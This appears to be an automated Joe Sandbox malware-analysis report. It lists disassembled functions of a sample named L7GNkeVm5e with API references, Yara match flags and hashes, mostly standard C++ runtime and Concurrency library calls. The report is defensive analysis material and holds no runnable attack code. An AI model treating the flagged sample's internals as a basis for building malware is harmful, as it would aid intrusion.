                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork$FindItemItem::MarkNextProcessor::Service
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 78362717-0
                                                                                                                                                                                                                                                  • Opcode ID: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
                                                                                                                                                                                                                                                  • Instruction ID: ba6f451568feed0ad97d4c35bc03da7052fef1102373e57c37541bd94dea7e10
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DD01F236700224A7CF16AE5AA811AFFB7A99F80354F41005BFC11A7282DE24FD2192A8
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 0212639F
                                                                                                                                                                                                                                                  • Concurrency::details::VirtualProcessor::ServiceMark.LIBCMT ref: 021263B3
                                                                                                                                                                                                                                                  • Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 021263CB
                                                                                                                                                                                                                                                  • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 021263E3
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork$FindItemItem::MarkNextProcessor::Service
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 78362717-0
                                                                                                                                                                                                                                                  • Opcode ID: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
                                                                                                                                                                                                                                                  • Instruction ID: 19a8331564f0c172ecdd19970953da6b456d220f3dc8ff413ca9f1fed834564e
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 12014932640134BBDF15EE59D940EEF779E9F94350F000015FC29A72C1DB70ED288AA0
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • Concurrency::location::_Assign.LIBCMT ref: 02122BA1
                                                                                                                                                                                                                                                  • Concurrency::details::SchedulerBase::GetBitSet.LIBCONCRT ref: 02122BBF
                                                                                                                                                                                                                                                    • Part of subcall function 02118677: Concurrency::details::QuickBitSet::QuickBitSet.LIBCMT ref: 02118698
                                                                                                                                                                                                                                                    • Part of subcall function 02118677: Hash.LIBCMT ref: 021186D8
                                                                                                                                                                                                                                                  • Concurrency::details::QuickBitSet::operator=.LIBCMT ref: 02122BC8
                                                                                                                                                                                                                                                  • Concurrency::details::SchedulerBase::GetResourceMaskId.LIBCONCRT ref: 02122BE8
                                                                                                                                                                                                                                                    • Part of subcall function 0211F6CF: Hash.LIBCMT ref: 0211F6E1
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Concurrency::details::$Quick$Base::HashScheduler$AssignConcurrency::location::_MaskResourceSet::Set::operator=
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2250070497-0
                                                                                                                                                                                                                                                  • Opcode ID: d379dd8d035abd09aa72343d0417816ebca02f1086c5fe86f80796eb41e1f0bb
                                                                                                                                                                                                                                                  • Instruction ID: 8c5871590f63bc07f84c6afea43f1c19560a074f9d8045d16a5890a57fc1a183
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d379dd8d035abd09aa72343d0417816ebca02f1086c5fe86f80796eb41e1f0bb
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A3118E76400604AFC725DFA4C881ECAFBB9AF19310F008A1EE95687591DB70F914CBA0
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • Concurrency::location::_Assign.LIBCMT ref: 02122BA1
                                                                                                                                                                                                                                                  • Concurrency::details::SchedulerBase::GetBitSet.LIBCONCRT ref: 02122BBF
                                                                                                                                                                                                                                                    • Part of subcall function 02118677: Concurrency::details::QuickBitSet::QuickBitSet.LIBCMT ref: 02118698
                                                                                                                                                                                                                                                    • Part of subcall function 02118677: Hash.LIBCMT ref: 021186D8
                                                                                                                                                                                                                                                  • Concurrency::details::QuickBitSet::operator=.LIBCMT ref: 02122BC8
                                                                                                                                                                                                                                                  • Concurrency::details::SchedulerBase::GetResourceMaskId.LIBCONCRT ref: 02122BE8
                                                                                                                                                                                                                                                    • Part of subcall function 0211F6CF: Hash.LIBCMT ref: 0211F6E1
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Concurrency::details::$Quick$Base::HashScheduler$AssignConcurrency::location::_MaskResourceSet::Set::operator=
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2250070497-0
                                                                                                                                                                                                                                                  • Opcode ID: 36e6617bf236213b9ae2a6ec488584fbad12b714714c281d1e824cb46c32bc20
                                                                                                                                                                                                                                                  • Instruction ID: 7dad9a61bbe8994f386adfb80ecf528b9569a665966d1cf9458ec8e64a54657c
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 36e6617bf236213b9ae2a6ec488584fbad12b714714c281d1e824cb46c32bc20
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 48011776400604AFC724EFA5C881EDAF7E9AF58310B008A2EA55687550DB71F954CBA0
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • __EH_prolog3_GS.LIBCMT ref: 0040591C
                                                                                                                                                                                                                                                    • Part of subcall function 0040BB3D: __EH_prolog3_GS.LIBCMT ref: 0040BB44
                                                                                                                                                                                                                                                  • std::_Locinfo::_Locinfo.LIBCPMT ref: 00405967
                                                                                                                                                                                                                                                  • __Getcoll.LIBCPMT ref: 00405976
                                                                                                                                                                                                                                                  • std::_Locinfo::~_Locinfo.LIBCPMT ref: 00405986
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1836011271-0
                                                                                                                                                                                                                                                  • Opcode ID: b945d4fba948faf335eba6a26c9d16208f5764ada45908dbcbdd3d34a3e84dcb
                                                                                                                                                                                                                                                  • Instruction ID: 7de8e0425e838f52bf763386e227ca4e4c8dd97e461cbe55c35c0d0d082d521b
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b945d4fba948faf335eba6a26c9d16208f5764ada45908dbcbdd3d34a3e84dcb
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 61011771910209DFDB10EFA5C486B9DB7B0EF04329F10843EE459BB681DB789549CF99
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • __EH_prolog3_GS.LIBCMT ref: 021050C7
                                                                                                                                                                                                                                                    • Part of subcall function 0210BDA4: __EH_prolog3_GS.LIBCMT ref: 0210BDAB
                                                                                                                                                                                                                                                  • std::_Locinfo::_Locinfo.LIBCPMT ref: 02105112
                                                                                                                                                                                                                                                  • __Getcoll.LIBCPMT ref: 02105121
                                                                                                                                                                                                                                                  • std::_Locinfo::~_Locinfo.LIBCPMT ref: 02105131
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1836011271-0
                                                                                                                                                                                                                                                  • Opcode ID: aff552bf37bfddc61d9e477734a816809d81299120f6a55e324a792514706cbd
                                                                                                                                                                                                                                                  • Instruction ID: eee5c36f6c607d7f128cf0e702bf806602672be303152480f775c76bfd9186e5
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: aff552bf37bfddc61d9e477734a816809d81299120f6a55e324a792514706cbd
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 91018C31D80308EFDB10EFA4C490B9CB7B6BF48310F10812AD045AB281CBF59944CF91
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • __EH_prolog3_GS.LIBCMT ref: 02105B83
                                                                                                                                                                                                                                                    • Part of subcall function 0210BDA4: __EH_prolog3_GS.LIBCMT ref: 0210BDAB
                                                                                                                                                                                                                                                  • std::_Locinfo::_Locinfo.LIBCPMT ref: 02105BCE
                                                                                                                                                                                                                                                  • __Getcoll.LIBCPMT ref: 02105BDD
                                                                                                                                                                                                                                                  • std::_Locinfo::~_Locinfo.LIBCPMT ref: 02105BED
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1836011271-0
                                                                                                                                                                                                                                                  • Opcode ID: ed65b9f5cd0855bdbf339c1b5aedfa909ef6e81665b606bc02af1812e3ab0e20
                                                                                                                                                                                                                                                  • Instruction ID: c996e50dc4be612a4932f8119d7cdc1669ec945078cdcfa7b7df22e4bf1dfa01
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ed65b9f5cd0855bdbf339c1b5aedfa909ef6e81665b606bc02af1812e3ab0e20
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 96014871990209EFDB14EFA4D490B9DBBB2BF48315F10852AD009AB280CBF99985CF91
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BEF9
                                                                                                                                                                                                                                                  • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF09
                                                                                                                                                                                                                                                  • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF19
                                                                                                                                                                                                                                                  • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF2D
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Compare_exchange_acquire_4std::_
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3973403980-0
                                                                                                                                                                                                                                                  • Opcode ID: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
                                                                                                                                                                                                                                                  • Instruction ID: 54cf5004022dc03f320fac5c152f4f5b0e5638c7bf5de93af177e0e0418c077f
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1901FB3744418DBBDF119E64DD428EE3B66EF08354B148516F918C4235C336CAB2EF89
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0211C160
                                                                                                                                                                                                                                                  • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0211C170
                                                                                                                                                                                                                                                  • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0211C180
                                                                                                                                                                                                                                                  • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0211C194
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Compare_exchange_acquire_4std::_
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3973403980-0
                                                                                                                                                                                                                                                  • Opcode ID: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
                                                                                                                                                                                                                                                  • Instruction ID: 8d820c24acc374eb456cba99c8f15ed5df4dc53ae4c7599942ba66f06a7e51ca
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4501B67A5C8149FBCF229F94DC018AE3B66AB65354F048433F92888470D732D671ABD3
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 004110CB
                                                                                                                                                                                                                                                    • Part of subcall function 0041093D: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 0041095F
                                                                                                                                                                                                                                                    • Part of subcall function 0041093D: Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 00410980
                                                                                                                                                                                                                                                  • Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 004110DE
                                                                                                                                                                                                                                                  • Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 004110EA
                                                                                                                                                                                                                                                  • Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 004110F3
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Concurrency::details::$LockQueue$Concurrency::critical_section::_NodeNode::Timer$Acquire_lockAsyncBase::ContextCurrentDerefLibraryLoadRegisterSchedulerSwitch_to_active
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 4284812201-0
                                                                                                                                                                                                                                                  • Opcode ID: 59b962ce0df35001d24a788376b82219d2b26174a8e6e3787add2960edfe3223
                                                                                                                                                                                                                                                  • Instruction ID: f673f10ca75d55ca35707f3ec936348daa0dfd556a05ba3ac72040e7cf752ef9
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 59b962ce0df35001d24a788376b82219d2b26174a8e6e3787add2960edfe3223
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2EF02470A002046BDF347BB648525EE35954F85318F04403FBA12AB7D1DEBC9DC6939D
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • Concurrency::details::LoadLibraryAndCreateThread.LIBCONCRT ref: 00413515
                                                                                                                                                                                                                                                    • Part of subcall function 0041289F: ___crtGetTimeFormatEx.LIBCMT ref: 004128B5
                                                                                                                                                                                                                                                    • Part of subcall function 0041289F: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 004128D4
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00413531
                                                                                                                                                                                                                                                  • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00413547
                                                                                                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00413555
                                                                                                                                                                                                                                                    • Part of subcall function 00412675: SetThreadPriority.KERNEL32(?,?), ref: 00412681
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Concurrency::details::LibraryLoadThread$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorException@8FormatLastPriorityReferenceThrowTime___crt
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1674182817-0
                                                                                                                                                                                                                                                  • Opcode ID: 3fadc1366d0a75540ac8f783509af273c6311a84a5b4fac4ceb4b62defc82512
                                                                                                                                                                                                                                                  • Instruction ID: 0599dc728a4d66ec5529e5430020c2b67b59d3184165c4d7970fdf63fa2ec416
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3fadc1366d0a75540ac8f783509af273c6311a84a5b4fac4ceb4b62defc82512
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6AF08271A002253AD724BA765D07FFB369C9B01B54F90095BB905E6186F9ECD99042AC
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • Concurrency::details::LoadLibraryAndCreateThread.LIBCONCRT ref: 0211377C
                                                                                                                                                                                                                                                    • Part of subcall function 02112B06: ___crtGetTimeFormatEx.LIBCMT ref: 02112B1C
                                                                                                                                                                                                                                                    • Part of subcall function 02112B06: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 02112B3B
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 02113798
                                                                                                                                                                                                                                                  • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 021137AE
                                                                                                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 021137BC
                                                                                                                                                                                                                                                    • Part of subcall function 021128DC: SetThreadPriority.KERNEL32(?,?), ref: 021128E8
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Concurrency::details::LibraryLoadThread$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorException@8FormatLastPriorityReferenceThrowTime___crt
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1674182817-0
                                                                                                                                                                                                                                                  • Opcode ID: 3fadc1366d0a75540ac8f783509af273c6311a84a5b4fac4ceb4b62defc82512
                                                                                                                                                                                                                                                  • Instruction ID: bd288b31d5e972b3c5039e386084366ebc06c808be959a3a2f89fc9fc969b5b3
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3fadc1366d0a75540ac8f783509af273c6311a84a5b4fac4ceb4b62defc82512
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: ADF0A0B2A803257EE720B7755C0AFBB369C9F01750F60097AF915E7084EBB9D4448BB8
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 02111332
                                                                                                                                                                                                                                                    • Part of subcall function 02110BA4: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 02110BC6
                                                                                                                                                                                                                                                    • Part of subcall function 02110BA4: Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 02110BE7
                                                                                                                                                                                                                                                  • Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 02111345
                                                                                                                                                                                                                                                  • Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 02111351
                                                                                                                                                                                                                                                  • Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 0211135A
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Concurrency::details::$LockQueue$Concurrency::critical_section::_NodeNode::Timer$Acquire_lockAsyncBase::ContextCurrentDerefLibraryLoadRegisterSchedulerSwitch_to_active
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 4284812201-0
                                                                                                                                                                                                                                                  • Opcode ID: fab2751c85c2460bc8d3eb096a8fe9c9e671c40a46efb78719edf7368fe23de1
                                                                                                                                                                                                                                                  • Instruction ID: c5542088139cd6c39b9e4d356b3cf1f4dac1e9538b62148d6d13cd9728c0bd4f
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fab2751c85c2460bc8d3eb096a8fe9c9e671c40a46efb78719edf7368fe23de1
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AFF02E31AD4308BF9F28BBB448615BEA2974F85320B080038DA116B3C0DFB18D41CAA8
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • Concurrency::details::SchedulerProxy::GetCurrentThreadExecutionResource.LIBCMT ref: 0211D078
                                                                                                                                                                                                                                                  • Concurrency::details::ResourceManager::RemoveExecutionResource.LIBCONCRT ref: 0211D09C
                                                                                                                                                                                                                                                  • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0211D0AF
                                                                                                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0211D0BD
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Resource$Concurrency::details::Execution$CurrentException@8Manager::Proxy::RemoveSchedulerThreadThrowstd::invalid_argument::invalid_argument
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3657713681-0
                                                                                                                                                                                                                                                  • Opcode ID: 91fe00c27762651b251d8766a9fdc76cd8d1da8bd6571df67899734432931397
                                                                                                                                                                                                                                                  • Instruction ID: a0111b00a836d1dc05694c521358933309380576a9c7cb7d1718e7d866014a9c
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 91fe00c27762651b251d8766a9fdc76cd8d1da8bd6571df67899734432931397
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C1F02E35980614AFC724FB54F841D5EB77F9ED0B14721817AD81513181EB72A90ACBA2
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • RegisterWaitForSingleObject.KERNEL32(?,00000000,00423582,000000A4,000000FF,0000000C), ref: 004125F8
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,004185B9,?,?,?,?,00000000,?,00000000), ref: 00412607
                                                                                                                                                                                                                                                  • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041261D
                                                                                                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0041262B
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastObjectRegisterSingleThrowWait
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3803302727-0
                                                                                                                                                                                                                                                  • Opcode ID: c7576253412bed51a53af5acb8f859d20b769276d3a1e4e3fae42923a132b8bd
                                                                                                                                                                                                                                                  • Instruction ID: 32cc1d4aaffc7e2d0c3ec5972b7dcb87793a3d4e5e2b79d3cb8e63f4c665dc5c
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c7576253412bed51a53af5acb8f859d20b769276d3a1e4e3fae42923a132b8bd
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2BF0A03460010ABBCF00EFA5DE45EEF37A86B00705F600616B611E20E1DBB8EA54976C
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • std::_Cnd_initX.LIBCPMT ref: 02105A79
                                                                                                                                                                                                                                                  • __Cnd_signal.LIBCPMT ref: 02105A85
                                                                                                                                                                                                                                                  • std::_Cnd_initX.LIBCPMT ref: 02105A9A
                                                                                                                                                                                                                                                  • __Cnd_do_broadcast_at_thread_exit.LIBCPMT ref: 02105AA1
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Cnd_initstd::_$Cnd_do_broadcast_at_thread_exitCnd_signal
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2059591211-0
                                                                                                                                                                                                                                                  • Opcode ID: 7b268af305ad7e70588f0d2166d3aa4120e27ad18746cc38b88b58263b6b4356
                                                                                                                                                                                                                                                  • Instruction ID: 84d5450a10e65adaeb3503a332d8841c3aa62f839b18afaa1d18c2c86f59f499
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7b268af305ad7e70588f0d2166d3aa4120e27ad18746cc38b88b58263b6b4356
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 49F0A032480701AFEB347B72D886B1A77A2AF00725F14482CD0895A8D0CFFAA8554E65
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • RegisterWaitForSingleObject.KERNEL32(?,00000000,00423582,000000A4,000000FF,0000000C), ref: 0211285F
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,02118820,?,?,?,?,00000000,?,00000000), ref: 0211286E
                                                                                                                                                                                                                                                  • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 02112884
                                                                                                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 02112892
                                                                                                                                                                                                                                                  Memory Dump Source
